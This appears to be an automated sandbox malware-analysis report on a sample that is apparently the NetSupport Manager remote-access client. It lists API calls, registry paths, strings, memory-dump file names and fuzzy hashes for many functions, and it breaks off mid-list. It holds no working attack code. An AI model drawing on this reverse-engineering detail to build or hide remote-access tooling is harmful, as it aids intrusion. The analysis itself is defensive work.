• Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
• Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
APIs
• OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
• CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
• GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
• SetLastError.KERNEL32(00000078), ref: 110306C2
• WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
• CloseHandle.KERNEL32(?), ref: 11030709
• FreeLibrary.KERNEL32(?), ref: 11030714
• CloseHandle.KERNEL32(00000000), ref: 1103071B
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
• String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
• API String ID: 2061479752-1320826866
• Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
• Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
• Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
• Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
APIs
• GetTickCount.KERNEL32 ref: 1110612E
• EnterCriticalSection.KERNEL32(111F060C), ref: 11106137
• GetTickCount.KERNEL32 ref: 1110613D
• GetTickCount.KERNEL32 ref: 11106190
• LeaveCriticalSection.KERNEL32(111F060C), ref: 11106199
• GetTickCount.KERNEL32 ref: 111061CA
• LeaveCriticalSection.KERNEL32(111F060C), ref: 111061D3
• EnterCriticalSection.KERNEL32(111F060C), ref: 111061FC
• LeaveCriticalSection.KERNEL32(111F060C,00000000,?,00000000), ref: 111062C3
  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
  • Part of subcall function 110F0CF0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106267,?), ref: 110F0D1B
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
• String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
• API String ID: 1574099134-3013461081
• Opcode ID: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
• Instruction ID: 01093d0ef8ba3b8d66a1f5e3f4838d53f0bc1b4d1e9212342b6ef41ebc516d7c
• Opcode Fuzzy Hash: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
• Instruction Fuzzy Hash: 64410E79F0411AABD700DFA59C81E9EFBB9EB8462CF524535F909E7240EA306904CBE1
APIs
  • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
• GetTickCount.KERNEL32 ref: 1102C47A
  • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
• GetTickCount.KERNEL32 ref: 1102C574
  • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
  • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
• CloseHandle.KERNEL32(?), ref: 1102C688
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
• String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
• API String ID: 596640303-1725438197
• Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
• Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
• Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
• Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                    APIs
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                      • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                      • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Enum$Open$CloseValue
                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                    • API String ID: 2823542970-1528906934
                                                                                    • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                    • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                    • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                    • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • GetTickCount.KERNEL32 ref: 11137692
                                                                                      • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                      • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                      • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                      • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                    • GetTickCount.KERNEL32 ref: 111376A1
                                                                                    • _memset.LIBCMT ref: 111376E3
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                    • _strrchr.LIBCMT ref: 11137708
                                                                                    • _free.LIBCMT ref: 1113775A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                    • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                    • API String ID: 711243594-1270230032
                                                                                    • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                    • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                    • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                    • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                    APIs
                                                                                      • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                      • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                      • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                      • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                      • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                      • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                    • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                    • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                    • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                    • GetDC.USER32(00000000), ref: 11133F03
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                    • CreateWindowExA.USER32(00000001,NSMWClass,02840900,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                    • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                    • API String ID: 1594747848-1114959992
                                                                                    • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                    • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                    • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                    • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                    APIs
                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,420B7E12,?,00000000,00000000), ref: 1102CE44
                                                                                    • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                    • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                    • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                    • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                    • API String ID: 83693535-2077998243
                                                                                    • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                    • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                    • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                    • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 11132C60
                                                                                    • GetTickCount.KERNEL32 ref: 11132C91
                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                    • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$FolderPathwsprintf
                                                                                    • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                    • API String ID: 1170620360-4157686185
                                                                                    • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                    • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                    • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                    • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                    APIs
                                                                                    • GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                    • _memset.LIBCMT ref: 1114512D
                                                                                      • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                    • _strncpy.LIBCMT ref: 111451FA
                                                                                      • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                    • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                    • API String ID: 3299820421-2117887902
                                                                                    • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                    • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                    • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                    • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                    APIs
                                                                                    • _strtok.LIBCMT ref: 11026C26
                                                                                    • _strtok.LIBCMT ref: 11026C60
                                                                                    • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
